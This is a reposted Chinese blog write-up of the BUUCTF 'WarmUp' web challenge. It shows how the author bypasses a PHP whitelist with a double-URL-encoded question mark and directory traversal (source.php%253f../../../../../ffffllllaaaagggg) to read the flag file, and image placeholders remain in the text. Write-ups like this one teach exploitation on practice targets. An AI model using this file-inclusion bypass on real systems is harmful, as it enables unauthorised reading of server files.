程序员最近都爱上了这个网站  程序员们快来瞅瞅吧!  it98k网:it98k.com

本站消息

站长简介/公众号

  出租广告位,需要合作请联系站长


+关注
已关注

分类  

暂无分类

标签  

暂无标签

日期归档  

BUUCTF Web WarmUp1

发布于2021-03-08 20:14     阅读(922)     评论(0)     点赞(4)     收藏(5)


BUUCTF Web WarmUp1

进入网站后发现什么也没有
按F12查看原代码,发现PHP在这里插入图片描述进入后发现一个新的PHP(hit.php)在这里插入图片描述
发现flag在ffffllllaaaagggg中在这里插入图片描述
仔细分析之前的代码
在这里插入图片描述因为flag在ffffllllaaaagggg中
为了读到ffffllllaaaagggg
可以加?file=source.php?/ffffllllaaaagggg

因为传入后服务器会自动解一次码
所以第二个问号要自己url加密一次
?file=source.php%3f/ffffllllaaaagggg

因为后来还会ur;解码一次
所以要对第二个问号还要加密一次
?file=source.php%253f/ffffllllaaaagggg

因为不知道ffffllllaaaagggg在哪个目录下
所以要在ffffllllaaaagggg前面加…/
?file=source.php%253f…/ffffllllaaaagggg

(这里的点有点问题,

以下面的代码片为准)

因为不知道在第几级目录下面
所以要一直加…/进行尝试
添加5个…/后就会得到flag
最后则变成

?file=source.php%253f../../../../../ffffllllaaaagggg

在这里插入图片描述
这道题目也不是很难,这是BUUCTF上web的第一题,需要注意的就是"?"的二次url编码

原文链接:https://blog.csdn.net/qq_52429415/article/details/114498318




所属网站分类: 技术文章 > 博客

作者:天使的翅膀

链接:http://www.qianduanheidong.com/blog/article/33699/333c5cc58e8d3520c9c3/

来源:前端黑洞网

任何形式的转载都请注明出处,如有侵权 一经发现 必将追究其法律责任

4 0
收藏该文
已收藏

评论内容:(最多支持255个字符)